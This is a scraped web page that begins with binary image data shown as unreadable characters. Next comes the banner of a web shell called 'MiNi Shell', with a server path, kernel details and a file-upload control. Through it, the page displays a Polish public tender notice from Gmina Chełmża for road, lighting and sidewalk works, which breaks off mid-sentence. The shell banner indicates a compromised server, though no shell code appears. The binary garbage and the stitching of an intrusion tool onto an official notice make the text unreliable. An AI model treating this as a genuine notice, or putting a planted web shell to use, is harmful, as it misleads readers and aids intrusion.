JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240206/0009367301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Chełmża</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118709</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wodna 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełmża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">/+48/ 56 675 60 75</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">embo@gminachelmza.pl; info@gminachelmza.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.gminachelmza.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9168a0dc-c4d7-11ee-a84d-d63fc4d19e65</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00093673</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00045884/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża-przebudowa dróg, budowa oświetlenia, budowa chodników</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ug_chelmza/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami prowadzona jest pisemnie w języku polskim (w rozumieniu art. 20 i art. 7 pkt. 16 PZP) przy użyciu środka komunikacji elektronicznej -jakim jest- platformazakupowa.pl pod adresem: <br/>https://platformazakupowa.pl/pn/ug_chelmza/proceedings i pod nazwą postępowania wskazaną w tytule SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami prowadzona jest pisemnie w języku polskim (w rozumieniu art. 20 i art. 7 pkt. 16 PZP) przy użyciu środka komunikacji elektronicznej -jakim jest- platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/ug_chelmza/proceedings i pod nazwą postępowania wskazaną w tytule SWZ.<br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami,<br/>w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl<br/>i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>Zamawiający dopuszcza, awaryjnie np. np. w przypadku przerwy w funkcjonowaniu lub awarii lub niedziałania Platformy zakupowej,<br/>komunikację z wykonawcami za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: embo@gminachelmza.pl , z <br/> zastrzeżeniem, że ofertę (w szczególności Formularz oferty i załączniki do oferty)<br/>wykonawca może złożyć wyłącznie za pośrednictwem Platformy zakupowej.<br/>3. Zamawiający będzie przekazywał wykonawcom informacje pisemnie (w rozumieniu art. 20 i art. 7 pkt. 16 PZP) przy użyciu środka<br/>komunikacji elektronicznej -jakim jest- platformazakupowa.pl . Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany<br/>terminu składania i otwarcia ofert - Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której<br/>zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana pisemnie (w rozumieniu art. 20 i<br/>art. 7 pkt. 16 PZP) przy użyciu środka komunikacji elektronicznej - jakim jest - platformazakupowa.pl do konkretnego wykonawcy.<br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl , tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) szyfrowanie na platformazakupowa.pl obywa się za pomocą protokołu TLS 1.3.<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Pozostałe informacje dotyczące wymagań technicznych i organizacyjnych dot. korespondencji elektronicznej zawarte są w rozdziale<br/>16 SWZ.<br/>Ponadto oferta powinna być podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym<br/>przez osobę/osoby upoważnioną/upoważnione.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, (Dz. Urz. UE L 119 z 4 maja 2016 r., str. 1 oraz Dz. Urz.<br/>UE L 127 z 23 maja 2018 r., str. 2), zwanego jako ,,RODO&#34; udostępniam klauzulę informacyjną. Administratorem danych osobowych<br/>jest Wójt Gminy Chełmża. Możesz się z nim kontaktować w następujący sposób: - listownie na adres siedziby: ul. Wodna 2, 87-140<br/>Chełmża, - e-mail: info@gminachelmza.pl - telefonicznie 56 675 60 76 lub 56 675 60 77. Do kontaktów w sprawie ochrony danych<br/>osobowych został także powołany inspektor ochrony danych, z którym możesz się kontaktować wysyłając e-mail na adres<br/>iod@gminachelmza.pl .<br/>1. Twoje dane osobowe przetwarzane będą na podstawie:<br/>1) art. 6 ust. 1 lit b) i c), art. 9 ust. 2 lit. g) i art. 10 RODO, w związku z ustawą z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, w celu realizacji obowiązku prawnego ciążącego na administratorze tj. udzielenia zamówienia publicznego, jak również<br/>w celu zawarcia umowy między zamawiającym a wykonawcą, której przedmiotem jest usługa, dostawa lub robota budowlana oraz<br/>jej realizacji (też umowa o podwykonawstwo), a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego<br/>archiwizacji;<br/>2) art. 6 ust. 1 lit a) RODO na podstawie zgody. Zgoda jest wymagana, gdy uprawnienie do przetwarzania danych osobowych nie<br/>wynika wprost z przepisów prawa, a przekażesz administratorowi z własnej inicjatywy więcej danych niż jest to konieczne dla<br/>załatwienia Twojej sprawy (tzw. działanie wyraźnie potwierdzające).<br/>2. Twoje dane osobowe możemy ujawniać, przekazywać i udostępniać wyłącznie podmiotom uprawnionym na podstawie<br/>obowiązujących przepisów prawa są nimi m.in. osoby lub podmioty, którym udostępniona zostanie dokumentacja zamówienia<br/>publicznego w oparciu o art. 18 oraz 74 ustawy Prawo zamówień publicznych, właściciele platformy zakupowej, na której<br/>prowadzone będzie postępowanie o udzielenie zamówienia publicznego, podmioty świadczące usługi bankowe, telekomunikacyjne<br/>oraz inne podmioty, gdy wystąpią z takim żądaniem oczywiście w oparciu o stosowną podstawę prawną. Pracownikom oraz<br/>współpracownikom administratora.<br/>Dalsze informacje dotyczące obowiązku informacyjnego zawarte są w rozdziale 30 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSO.271.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja Części I pod nazwą Przebudowa dróg na terenie Gminy Chełmża, stanowiąca część przedsięwzięcia - określonego w Promesie Wstępnej, jako „Inwestycja” - o nazwie: „Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża” i oznaczonego, jako część I. <br/>2.	Zadanie objęte zostanie dofinansowaniem z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych. Dofinansowanie zostanie zrealizowane na podstawie Promesy Wstępnej, którą Zamawiającemu udzielił Bank Gospodarstwa Krajowego przed zawarciem umowy o zamówienie publiczne. Kwota dofinansowania - wskazana w Promesie Wstępnej - wynosi nie więcej niż 7.552.500,00 PLN (słownie: siedem milionów pięćset pięćdziesiąt dwa tysiące pięćset złotych i zero groszy) i dotyczy całego przedsięwzięcia p/n „Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża”.<br/>3.	Zakres robót obejmuje przebudowę dróg na terenie Gminy Chełmża:<br/>1)	Droga 1 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100557 C <br/>w miejscowości Grzywna” na odcinku o długości 529 mb;<br/>2)	Droga 2 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100558 C <br/>w miejscowości Grzywna” na odcinku o długości 500 mb;<br/>3)	Droga 3 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100561 C <br/>w miejscowości Kuczwały” na odcinku o długości 412 mb;<br/>4)	Droga 4 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100584 C <br/>w miejscowości Kuczwały” na odcinku o długości 219 mb;<br/>5)	Droga 5 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100579 C <br/>w miejscowości Kuczwały” na odcinku o długości 375 mb;<br/>6)	Droga 6 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100546 C <br/>w miejscowości Kiełbasin” na odcinku o długości 155 mb;<br/>7)	Droga 7 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100564 C <br/>w miejscowości Kiełbasin” na odcinku o długości 660 mb;<br/>8)	Droga 8 w ramach Części I zamówienia - „Przebudowa drogi wewnętrznej działka nr 20/4 w miejscowości Parowa Falęcka” na odcinku o długości 294 mb;<br/>9)	Droga 9 w ramach Części I zamówienia - „Przebudowa drogi wewnętrznej działka nr 24/139 w miejscowości Zalesie” na odcinku o długości 557 mb;<br/>10)	Droga 10 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100509 C <br/>w miejscowości Liznowo” na odcinku o długości 484 mb;<br/>11)	Droga 11 w ramach Części I zamówienia - „Przebudowa drogi wewnętrznej działka nr 102/1 w miejscowości Bielczyny” na odcinku o długości 295 mb;<br/>12)	Droga 12 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100544 C Sławkowo - Mirakowo” na odcinku o długości 645 mb;<br/>13)	Droga 13 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100551 C <br/>w miejscowości Kończewice” na odcinku o długości 385 mb;<br/>14)	Droga 14 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100549 C w miejscowości Kończewice - Ogrodniki” na odcinku o długości 508 mb;<br/>15)	Droga 15 w ramach Części I zamówienia - „Przebudowa drogi gminnej nr 100593 C <br/>w miejscowości Nawra” na odcinku o długości 60 mb;<br/>16)	Droga 16 w ramach Części I zamówienia - „Przebudowa drogi wewnętrznej działka nr 3/8 w miejscowości Dźwierzno” na odcinku o długości 126 mb;<br/>17)	Droga 17 w ramach Części I zamówienia - „Przebudowa drogi wewnętrznej działka nr 103/1 w miejscowości Nowa Chełmża” na odcinku o długości 175 mb;<br/>18)	Droga 18 w ramach Części I zamówienia - „Przebudowa drogi wewnętrznej w m. Skąpe ul. Bukowa, Gmina Chełmża” na odcinku o długości 290 mb;<br/>19)	Droga 19 w ramach Części I zamówienia - „Przebudowa drogi wewnętrznej w m. Strużal, ul. Wietrzna” na odcinku o długości 331 mb,<br/>i opisany został w załącznik Nr 1 do umowy - Część I zamówienia pn.: Przebudowa dróg na terenie Gminy Chełmża w ramach zadania pn.:Przebudowa dróg, budowa oświetlenia drogowego oraz budowa chodników na terenie Gminy Chełmża.<br/>4.	Przedmiot zamówienia należy wykonać zgodnie z postanowieniami umowy, specyfikacją warunków zamówienia zwaną również „SWZ”, złożoną ofertą, zasadami sztuki budowlanej i wiedzy technicznej, obowiązującymi normami, przepisami i technologiami producentów materiałów i urządzeń zastosowanych przy realizacji zamówienia oraz z:<br/>1)	dokumentacją projektową dla każdej drogi opisaną w załączniku Nr 1, uwzględniającą rozwiązania ułatwiające dostęp do przebudowywanych dróg przez osoby niepełnosprawne; <br/>2)	zaświadczeniem Starosty Toruńskiego dla każdej drogi wymienionym w załączniku Nr 1;<br/>3)	specyfikacją techniczną wykonania i odbioru robót dla każdej drogi wymienioną w załączniku Nr 1.<br/>5.	Zakres robót w ramach ustalonego wynagrodzenia i zakresu określonego w ust. 3 obejmuje dla każdej drogi: <br/>1)	wykonanie projektu organizacji ruchu na czas budowy w zakresie niezbędnym do prowadzenia robót objętych umową wraz z niezbędnymi uzgodnieniami i decyzjami, umożliwiający dojazd do domów i pól oraz poniesienie kosztów związanych z zajęciem pasa drogowego- jeżeli zostaną naliczone;<br/>2)	obsługę geodezyjną polegającą na wytyczeniu przebiegu każdej przebudowanej drogi;<br/>3)	geodezyjną inwentaryzację powykonawczą każdej przebudowanej drogi wraz ze sporządzoną w jej wyniku dokumentacją geodezyjno-kartograficzną z pomiarów (mapa zasadnicza 1:500 lub 1:1000 obejmującą cały zakres robót), złożenie w Powiatowym Ośrodku Dokumentacji Geodezyjno-Kartograficznej w Toruniu i przekazanie potwierdzonych kopii Zamawiającemu przy odbiorze;<br/>4)	naprawienie urządzeń melioracyjnych oraz niezinwentaryzowanych urządzeń podziemnych zniszczonych w trakcie prowadzonych robót;<br/>5)	uporządkowanie pozostałej części terenu w granicach własności działek stanowiących drogę;<br/>6)	sporządzenie i skompletowanie dokumentacji powykonawczej, w dwóch egzemplarzach dla każdej przebudowywanej drogi oraz na wcześniej zgłoszone żądanie Zamawiającego kosztorysu powykonawczego; <br/>7)	inne prace związane z procesem budowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) cena (C) – waga kryterium 60%;<br/>2) okres gwarancji (G) – waga kryterium 40%.<br/><br/>Obowiązują takie same kryteria dla każdej części – dotyczy każdego kryterium.<br/>Ocena ofert (częsciowych) będzie dokonywana oddzielnie dla każdej części.<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/><br/>Ad 1. Cena <br/><br/>Cena oferty (Cn) – oferta z najniższą ceną otrzyma maksymalną ilość punktów = 100, pomnożone przez współczynnik 0,60; oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty najtańszej, wg wzoru <br/><br/>Cn = C of. n. /C of. b. x 100 x 0,60 <br/>gdzie:<br/>Cn - liczba punktów za kryterium cena;<br/>C of.n. - cena oferty najkorzystniejszej;<br/>C of.b. - cena oferty badanej.<br/><br/>Ad 2. Okres gwarancji <br/><br/>Uwaga! <br/>1)	Zaoferowany okres gwaracji jest tożsamy z zaoferowanym okresem rękojmi. Okres rękojmii zostaje więc rozserzony analogicznie do zaoferowanego okresu gwarancjii;<br/>2)	Minimalny okres gwarancji wynosi 36 miesięcy od daty odbioru końcowego przedmiotu zamówienia; <br/>3)	Maksymalny okres gwarancji dla oceny oferty wynosi 60 miesięcy od daty odbioru końcowego przedmiotu zamówienia;<br/>4)	Jeżeli którykolwiek wykonawca zaoferuje okres gwarancji dłuższy niż maksymalny podany przez zamawiającego, otrzyma liczbę punktów taką, jak przewidziano dla maksymalnego okresu gwarancji;<br/>5)	Jeżeli którykolwiek z Wykonawców w ofercie wskaże okres krótszy niż minimalny okres gwarancji (36 miesięcy), oferta taka będzie podlegała odrzuceniu.<br/>6)	Brak w ofercie wpisu dotyczący długości okresu gwarancji, będzie traktowany przez Zamawiającego jako minimalny 36 miesięczny okres gwarancji.<br/> <br/>Okres gwarancji (G) – oferta z najdłuższym terminem gwarancji otrzyma maksymalną ilość punktów = 100, pomnożone przez współczynnik 0,40; oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty z najdłuższym okresem gwarancji, wg wzoru: <br/><br/>G = G of. b. /G. of. z najdłuższym zaoferowanym okresem gwarancji x 100 x 0,40 <br/>gdzie:<br/>G - liczba punktów za kryterium okres gwarancji; <br/>G of.b. - okres gwarancji oferty badanej;<br/>G of.n. - okres gwarancji oferty z najdłuższym zaoferowanym okresem gwarancji.<br/><br/>Oferta (częściowa) najkorzystniejsza, to oferta (częściowa) która otrzyma najwyższą liczbę punków stanowiącą sumę punktów przyznanych w ramach każdego z kryteriów <br/>i w ramach danej części. <br/><br/>O = Cn + G <br/>O - ocena oferty w punktach (suma);<br/>Cn - liczba punktów za kryterium cena; <br/>G - liczba punktów za kryterium okres gwarancji.<br/><br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. Zamawiający 